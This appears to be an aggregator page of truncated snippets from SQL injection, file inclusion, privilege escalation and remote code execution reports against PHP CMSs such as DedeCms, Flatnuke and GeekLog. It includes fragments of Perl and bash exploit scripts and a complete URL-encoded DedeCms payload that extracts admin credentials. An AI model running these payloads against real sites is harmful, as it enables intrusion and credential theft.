74cms 20150817 设计缺陷导致8处不同文件注入(gpc=off)

简要描述： 直接出数据。 详细说明： http://download.74cms.com/download/74cmsv3.6beta20150817.zip 下载地址。 74cms的全局文件是include/common.inc.php 其中里面有 if !empty$GET $GET = help::addslashesdeep$GET; if !empty$POST $POST = help::addslashesdeep$POST; $COOKIE = help::addslashesdeep$COOKIE; $REQUEST =...

TinyShop SQL注入（开启GPC，绕过过滤）

简要描述： 之前的都是找程序员的疏忽，这个位置是绕过程序的防注入。 详细说明： 环境： GPC = On public static function sql$str //过滤函数 if !getmagicquotesgpc //gpc off 就转义，把之前那个奇葩的漏洞补了 //不使用主要是因为，先有mysql的连接 //$str = mysqlrealescapestring$str; $str = addslashes$str; $str =...

qibocms 多个系统同一原因的sql注入

简要描述： 因为qibocms 拥有很多系统。 看了看昨天发的那个洞 今天再下载了几个qibo其他的系统 发现有一部分系统存在该洞。 鉴于之前qibocms打补丁的时候总是打了几个系统 而遗漏了其他几个系统。 就把存在这洞的系统全部一个一个的写出来。 详细说明： 统一来看看全局文件 $POST=AddS$POST; $GET=AddS$GET; $COOKIE=AddS$COOKIE; function AddS$array foreach$array as $key=$value if!isarray$value $value=strreplace"&x","& x",$value;...

GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)

No description provided by source. !/usr/bin/perl -w use IO::Socket; print \r\n; print | Geeklog 1. remote commands execution |\r\n; print | By rgod rgodATautisticiDOTorg |\r\n; print | site: http://retrogod.altervista.org |\r\n; print | |\r\n; print \r\n; print | - this works against...

Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit

No description provided by source. !/usr/bin/env perl Flatnuke = 2.7.1 level Privilege Escalation 0-day Exploit Description ----------- Flatnuke contains one flaw that may allow a user to become administrator. The issue is due to 'sections/noneLogin/section.php' script not properly sanitizing use...

织梦内容管理系统(DedeCms) 小说模块insert注入漏洞

DedeCms是免费的PHP网站内容管理系统。 织梦内容管理系统DedeCms 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统。 在gpc=off的情况下，小说模块添加章节insert注入漏洞。 0 Dedecms 厂商补丁： dedecms ------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.dedecms.com/products/dedecms/...

Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection

============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less view-templateName = "admin"; parent::construct; $this-lang = SantilgaLanguage::getInstance-getLanguage; $this-view-lang = $this-lang; $this-view-showUploadForm = false; public function...

Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection

Exploit for php platform in category web applications ============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less view-templateName = "admin"; parent::construct; $this-lang = SantilgaLanguage::getInstance-getLanguage; $this-view-lang = $this-lang;...

MyHobbySite 1.01 - SQL Injection Authentication Bypass

MyHobbySite 1.01 - SQL Injection Authentication Bypass Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability Date: 12-09-2010 Author: YuGj VN Email: [email protected] Software Link: http://www.myhobbysite.net/index.php?page=15 Version: v1.01 Bug Code: if...

dedecms 5.6 RSS subscription page injection vulnerability-vulnerability warning-the black bar safety net

EXP: the uploads/plus/rss. php? tid=1&Cs1=1&Cs2%2 9% 2 9%20AND%2 0% 2 2% 2 7% 2 2%20AND%20updatexml%2 8 1,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,1 6% 2 9,0x5d%2 9%20FROM%20dedeadmin%29,1%2 9%2 3%2 70=1 The use of the environment: GPC off There updatexml function...

PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)

PHP-Nuke new; my $average = 0; print "+ Calculating average load time may take a while ...\n"; for my $i = 0; $i get$hosto; my $time = time; $average += int$time-$bef; return $average/5; sub Nuke::Usage print "+ Usage: perl nuke.pl \n"; print "+ the host must be the complete path to modules.php\n...

ArabPortal 2.2.x SQL Injection

Exploit Title: ArabPortal V2.2.x Remote SQL Injection Vulnerability Author: SwEET-DeViL Published: 10-6-2010 Software Link: http://www.arab-portal.info/download.php?action=download&fileid=127 Version: 2.2.x Tested on: Lunix Need : Magic Quotes Gpc = Off | |...

MoME CMS 0.8.5 - Remote Authentication Bypass

'/ -.- --------------------oOO------OOo------------------- | MoME CMS ! Download: http://sourceforge.net/projects/mome/files/ ! Date: 16.01.2010 ! Remote: yes ! Code : //controllo user e passwd da login ifisset$POST'postedusername' && isset$POST'postedpassword' $query="SELECT FROM users WHERE...

DasForum Local File Inclusion

'/ -.- --------------------oOO------OOo------------------- | DasForum layout Local File Inclusion Exploit | | works only with magicquotesgpc = off | ------------------------------------------------------ ! Discovered: cr4wl3r ! Download: http://mirror.vocabbuilder.net/savannah/dasforum/ ! Date:...

cP Creator 2.7.1 - SQL Injection

cP Creator 2.7.1 - SQL Injection !/usr/bin/python cP Creator v2.7.1 Remote Sql Injection AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com - Coming Soon Again My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidani ...

Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit

No description provided by source. !/bin/bash Gazelle CMS 1.0 Multiple Vulnerabilities Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download Found by whitesheep on 11/08/2009 Contact: [email protected] - https://www.ihteam.net Need magicquotegpc Off for RCE and LFI...

Irokez CMS 0.7.1 Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications =================================================== Irokez CMS 0.7.1 Remote SQL Injection Vulnerability ===================================================...

Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit

Exploit for unknown platform in category web applications ============================================================= Flatnuke timeout5; $lwp-agent'Links 2.1pre26; Linux 2.6.19-gentoo-r5 x8664; x'; $lwp-defaultheader'Cookie' = "myforum=$user; path=$path; secid=$secid; path=$path;"; $ret =...

Flatnuke 2.7.1 - level Privilege Escalation

Flatnuke 2.7.1 - level Privilege Escalation !/usr/bin/env perl Flatnuke timeout5; $lwp-agent'Links 2.1pre26; Linux 2.6.19-gentoo-r5 x8664; x'; $lwp-defaultheader'Cookie' = "myforum=$user; path=$path; secid=$secid; path=$path;"; $ret = $lwp-post"http://$h...

fuzzylime cms 3.01 Remote Command Execution Exploit

Exploit for unknown platform in category web applications =================================================== fuzzylime cms 3.01 Remote Command Execution Exploit =================================================== !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams DESCRIPTION...